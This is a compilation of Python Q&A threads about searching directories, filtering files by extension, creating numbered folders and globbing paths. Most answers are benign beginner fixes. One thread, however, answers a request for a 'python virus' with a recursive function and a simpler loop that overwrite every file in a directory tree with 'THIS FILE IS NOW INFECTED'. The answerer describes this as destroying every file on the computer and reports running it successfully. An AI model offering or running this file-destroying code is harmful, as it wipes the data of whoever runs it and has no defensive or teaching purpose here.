Search a file directory that is given as an input? - python

So I've been given a task to take 3 parameters from a user, and then do these tasks:
Search the folder given as input.
Find all of a certain file type extension.
Print this to another folder.
Is there an easier way of performing this task? When I try os.listdir, it reports that it can't find the file, as if it doesn't accept a variable as input.
Directories = [];
InitDirect = str(input('Please insert the file directory you want to search (C:\\x)'))
FileType = str(input('Please state a desired file type (.txt, .png)'))
OutDirect = str(input('Please state the output directory for the files.'))
for file in os.listdir("InitDirect"):
    if file.endswith("FileType"):
        print(os.path.join("InitDirect", file))
This is my current code, although likely incorrect. If anyone could help, that'd be great!

There is no need to put quotes around the variable names. Wrapping a name in "" creates a string literal, so os.listdir("InitDirect") looks for a folder literally called InitDirect instead of using the value stored in the variable. Change the code to the following and it should work.
import os

Directories = []
InitDirect = str(input('Please insert the file directory you want to search (C:\\x)'))
FileType = str(input('Please state a desired file type (.txt, .png)'))
OutDirect = str(input('Please state the output directory for the files.'))
# Pass the variables themselves, not strings containing their names.
for file in os.listdir(InitDirect):
    if file.endswith(FileType):
        print(os.path.join(InitDirect, file))
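The snippet above only prints the matching paths; the third step of the task (sending the results to another folder) is not covered. Here is a minimal sketch of that step, assuming that "print this to another folder" means copying the matching files there. The helper name copy_by_extension is hypothetical and not part of the original answer.

```python
import os
import shutil


def copy_by_extension(src_dir, extension, out_dir):
    """Copy every file in src_dir whose name ends with extension into out_dir.

    Hypothetical helper for illustration; returns the copied file names.
    """
    os.makedirs(out_dir, exist_ok=True)  # create the output folder if needed
    copied = []
    for name in sorted(os.listdir(src_dir)):
        source = os.path.join(src_dir, name)
        # Skip sub-directories; only regular files are copied.
        if os.path.isfile(source) and name.endswith(extension):
            shutil.copy2(source, os.path.join(out_dir, name))
            copied.append(name)
    return copied
```

With the variables from the answer, the call would be copy_by_extension(InitDirect, FileType, OutDirect).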

Related

How to create a unique folder name (location path) in Windows?

I am writing a script that saves some images in a folder each time it runs.
I would like to make a new folder each time it runs, with enumerated folder names. For example, the first time I run it, it saves the images in C:\images\folder1; the next time, it saves them in C:\images\folder2, then C:\images\folder3, and so on.
And if I delete these folders and start running it again, it should start from "C:\images\folder1" again.
I found this solution, which works for file names but not for folder names:
Create file but if name exists add number
The pathlib library is the standard pythonic way of dealing with any kind of folders or files, and it is system independent. As for creating a new folder name, that could be done in a number of ways. You could check for the existence of each folder (like Patrick Gorman's answer), or you could save a user config file with a counter that keeps track of where you left off, or you could call your creation function again with the counter advanced if the folder already exists. If you are planning on having a large number of sub-directories (millions), then you might consider performing a binary search for the next folder to create (instead of iterating through the directory).
Anyway, in Windows, creating a file/folder with the same name adds a (2), (3), (4), etc. to the filename. The space and parentheses make it particularly easy to identify the number of the file/folder. If you want the number directly appended, like folder1, folder2, folder3, etc., then it becomes a little tricky to detect. We essentially need to check whether the folder name ends with an integer. Finding particular expressions within a tricky string is normally done with re (regular expressions). If we had a space and parentheses, we probably wouldn't need re to detect the integer in the string.
from pathlib import Path
import re

def create_folder(string_or_path):
    path = Path(string_or_path)
    if not path.exists():
        # You can't create files and folders with the same name in Windows. Hence, check exists.
        path.mkdir()
    else:
        # Check if string ends with numbers and group the first part and the numbers.
        search = re.search('(.*?)([0-9]+$)', path.name)
        if search:
            basename, ending = search.groups()
            newname = basename + str(int(ending) + 1)
        else:
            newname = path.name + '1'
        create_folder(path.parent.joinpath(newname))

path = Path(r'C:\images\folder1')
create_folder(path)  # creates folder1
create_folder(path)  # creates folder2, since folder1 exists
create_folder(path)  # creates folder3, since folder1 and 2 exist
path = Path(r'C:\images\space')
create_folder(path)  # creates space
create_folder(path)  # creates space1, since space exists
Note: Be sure to use raw strings when dealing with Windows paths, since "\f" is an escape sequence (form feed) in a Python string; you either have to write "\\f" or mark the string as raw with the r prefix.
I feel like you could do something by getting a list of the directories and then looping over numbers 1 to n for the different possible directories until one can't be found.
from pathlib import Path

path = Path('.')
folder = "folder"
i = 1
# Collect directory names as strings; comparing a string against Path objects never matches.
dirs = {e.name for e in path.iterdir() if e.is_dir()}
while folder + str(i) in dirs:
    i = i + 1
(path / (folder + str(i))).mkdir()
I'm sorry if I made any typos, but that seems like a way that should work.
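Both answers check which names exist and then create the folder. A variant is to attempt the creation directly and treat FileExistsError as "this number is taken", which avoids the gap between checking and creating. This is only a sketch; the function name make_next_folder and its prefix parameter are hypothetical.

```python
from pathlib import Path


def make_next_folder(parent, prefix="folder"):
    """Create parent/prefix1, parent/prefix2, ... and return the new Path.

    Hypothetical helper: the lowest free number is used, so numbering
    restarts at 1 once the earlier folders have been deleted.
    """
    parent = Path(parent)
    parent.mkdir(parents=True, exist_ok=True)  # make sure the parent exists
    i = 1
    while True:
        candidate = parent / f"{prefix}{i}"
        try:
            candidate.mkdir()  # raises FileExistsError if the name is taken
            return candidate
        except FileExistsError:
            i += 1
```

For the question's layout, the call would be make_next_folder(r'C:\images').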

How can I open a directory by its name?

I am writing a program that prompts for the name of a directory and then saves all the file names in a list. How can I get the path to a specific directory knowing only its name?
I tried os.path.dirname(os.path.realpath(__file__)) but it would only show me my current dir, where the file with the program is, not the searchable dir.
__file__ is a special variable in Python that holds the current file's path. If I understand your question correctly, all you need is to pass the variable holding the user's input in place of __file__, and drop the os.path.dirname call, which would otherwise strip the last path component and give you the parent directory. So you will have something like:
import os

print("what dir do you want to search?")
searchable_dir = input()
# realpath resolves a relative name against the current working directory
print(
    "You selected " +
    os.path.realpath(searchable_dir)
)
This is good as a learning exercise, but note that to get a list of files in a directory the preferred method would be to use os.listdir.
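A minimal sketch of the os.listdir approach follows. It assumes the directory name is either an absolute path or relative to the current working directory; a bare name alone is not enough to locate a directory elsewhere on disk. The function name list_file_names is hypothetical.

```python
import os


def list_file_names(directory_name):
    """Return the names of the regular files directly inside directory_name."""
    # A relative name is resolved against the current working directory.
    directory = os.path.abspath(directory_name)
    return sorted(
        name for name in os.listdir(directory)
        if os.path.isfile(os.path.join(directory, name))
    )
```

Calling list_file_names(searchable_dir) with the prompted value gives the list of file names the question asks for; sub-directories are left out.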

How can I design a function which opens a folder based on user input, picks files with certain title format, and then reads specific lines from them?

I am having a moment of complete brain freeze right now and cannot seem to figure out how to design a code that will perform a series of tasks in one function. Basically, I want to design a code that asks the User for the input of a name of a folder in the working directory. The folders will have a 6 digit number for their name (for this example, let's assume the number of the folder is 111234). Once the folder is specified, certain files inside said folder will be opened and read. These files will be selected based on how their filenames are formatted, which is
(foldername)_(filenumber)_0_structure.in
wherein, for this example, the foldername is 111234 and the filenumber represents the order that the file appears in within the folder (can be the number zero or higher). The other terms in the filename (such as the zero after the filenumber), the word "structure", and the .in file extension are all constant. After all files that conform to this format are selected and opened, I want the 2nd and 3rd lines of these files to be read and copied into a dict whose keys are the file's filenumber and whose values contain a list of strings (i.e. the 2nd and 3rd lines).
So far, I have written the following in order to address these needs:
import os
from os import path
import re
def folder_validation(foldername):
    folder_contents= {}
    while True:
        try:
            foldername= str(raw_input(foldername))
            file_path= path.join(current_directory, foldername)
        except IOError:
            print("Please give the name of a folder that exists in the current working directory.")
            continue
        for filename in os.listdir(file_path):
            if re.search("{}_{}_0_detect1.in".format(foldername,[0*]), filename):
                file_contents= str(open(filename).readlines()[2:3])
                folder_contents[filenumber]= file_contents
        return folder_contents
folder_input= folder_validation("Please give the name of the relevant folder you wish to analyze:")
The most obvious problem with the above code is that I am not sure how to format the regular expression search to include the user's input and the placement of any integer number in the filenumber variable. Additionally, the raw_input does not seem to be working. Any assistance would be most appreciated.
There were two main problems in my code: the first problem was that I did not properly configure the while loop condition and so the code would get stuck. The second problem was that I did not set up the filepath to my files in my folder correctly, and as a result, my code could not open the files and read them. The regex line was also improved to include any filenames that had numbers 0 and above be read (in the specified format). The corrected version of the code is posted below.
import os
from os import path
import re

def folder_validation(prompt):
    folder_contents = {}
    current_directory = os.getcwd()
    while True:
        # raw_input() only exists in Python 2; Python 3 renamed it to input().
        foldername = input(prompt)
        file_path = path.join(current_directory, foldername)
        # path.join never raises IOError, so test for the folder explicitly.
        if path.isdir(file_path):
            break
        print("Please give the name of a folder that exists in the current working directory.")
    # Capture the file number (0 or higher) so it can serve as the dict key.
    pattern = re.compile(r"{}_([0-9]+)_0_detect1\.in$".format(re.escape(foldername)))
    for filename in os.listdir(file_path):
        match = pattern.match(filename)
        if match:
            with open(path.join(file_path, filename)) as file_contents:
                # Indices 1 and 2 are the 2nd and 3rd lines of the file.
                folder_contents[match.group(1)] = file_contents.readlines()[1:3]
    return folder_contents

folder_input = folder_validation("Please give the name of the relevant folder you wish to analyze:")
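The filename matching can be tried out separately from the file reading. The sketch below builds the pattern from the folder name and returns the file number as an integer. The function name parse_filenumber and its suffix parameter are hypothetical; the default suffix follows the code above, while the question's prose describes the suffix as _0_structure.in.

```python
import re


def parse_filenumber(foldername, filename, suffix="_0_detect1.in"):
    """Return the file number embedded in filename, or None if it does not match.

    Expected format: <foldername>_<filenumber><suffix>
    """
    # re.escape keeps characters such as "." from acting as regex wildcards.
    pattern = r"{}_([0-9]+){}$".format(re.escape(foldername), re.escape(suffix))
    match = re.match(pattern, filename)
    return int(match.group(1)) if match else None
```

For example, parse_filenumber("111234", "111234_12_0_detect1.in") gives 12, while a filename from another folder gives None.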

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.
Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
    print item # or do something else with item
So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"
Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

Generalize a program using iglob

I have a program which scans a folder or path for a given type of file and then analyzes the files.
import glob
path = raw_input("ENTER PATH TO SEARCH: ")
list_of_file = glob.iglob('*.txt')
for filename in list_of_file:
    print filename
But this script only scans the directory in which it is stored; the value entered for path is never used.
Now if I write:
list_of_file = glob.iglob(path + '*.txt')
this does not work either.
So please suggest a way to make the program follow whatever path I enter and search there for particular file types, no matter where I keep my script.
I assume English is not your first language, so please forgive me if I have misunderstood your question. It seems to me that you want to be able to enter a directory and then find all the ".txt" files in that directory?
If so, then the following code should suffice to give you an example:
"""Find all .py files in a given directory."""
import os
import glob
path = raw_input("Enter path: ")
# os.path.join inserts the path separator that plain string concatenation leaves out.
fullglob = os.path.join(path, "*.py")
for fn in glob.iglob(fullglob):
    print os.path.split(fn)[1]
The path you entered is joined to the pattern so that iglob() searches the right directory; the last line then strips that directory part off again so only the file name is printed. You can use the help() function to get documentation on os.path.join() and os.path.split().
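For Python 3, the same idea can be sketched with pathlib, which joins the directory and the pattern for you. This is an illustration only, not the answerer's code; the function name find_files and its default pattern are hypothetical.

```python
from pathlib import Path


def find_files(directory, pattern="*.txt"):
    """Return the names of the files in directory that match pattern."""
    # Path.glob searches inside directory, wherever the script itself lives.
    return sorted(p.name for p in Path(directory).glob(pattern) if p.is_file())
```

A call such as find_files(path, "*.py") returns the matching file names without their directory part.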
